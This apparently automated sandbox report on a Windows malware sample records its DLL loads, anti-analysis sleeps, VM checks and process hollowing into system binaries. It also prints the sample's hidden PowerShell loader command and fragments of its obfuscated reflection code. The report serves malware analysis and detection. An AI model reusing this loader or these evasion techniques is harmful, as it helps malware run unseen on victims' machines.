Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exe | Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exe | Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exe | Section loaded: usp10.dll
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exe | Section loaded: msls31.dll
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exe | Section loaded: wintypes.dll (3 identical entries)
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll (2 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: Ej86aa7Ki7.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Fermal $Ruteflyenes $Oestrum), (Niendedelens178 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Tightfisted = [AppDomain]::CurrentDomain.GetAssemblies()$gl
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Nvnt)), $Tackies).DefineDynamicModule($Sidse, $false).DefineType($Dkvinget, $ren, [System.MulticastDelegate])$Borgenes.DefineConstruct
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Fysioterapiens=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Taarnvognenes.Ufe';$Blinn=$Fysioterapiens.SubString(29179,3);.$Blinn($Fysioterapiens) (2 identical entries)

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (4 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (3 identical entries)
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\SIHClient.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5446
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4249
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5084 | Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\SIHClient.exe TID: 6416 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\SIHClient.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\SIHClient.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exe | Code function: 0_2_00406555 FindFirstFileW,FindClose,0_2_00406555
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exe | Code function: 0_2_0040287E FindFirstFileW,0_2_0040287E
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exe | Code function: 0_2_00405A03 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405A03
Source: ModuleAnalysisCache.2.dr | Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: ModuleAnalysisCache.2.dr | Binary or memory string: Add-NetEventVmNetworkAdapter
Source: SIHClient.exe, 00000004.00000003.2214265564.0000017F02A86000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.2212798692.0000017F02A86000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.2599488097.0000017F02A86000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.2592563659.0000017F02A86000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.2212344595.0000017F02A86000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.2214561565.0000017F02A3B000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.2213664258.0000017F02A86000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.2212310953.0000017F02A3A000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.2598946265.0000017F02A35000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000002.2600438470.0000017F02A86000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: ModuleAnalysisCache.2.dr | Binary or memory string: Get-NetEventVmNetworkAdapter
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exe | API call chain: ExitProcess graph end node graph_0-3535
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section unmapped: unknown base address: 400000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section unmapped: C:\Windows\System32\SIHClient.exe base address: 400000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
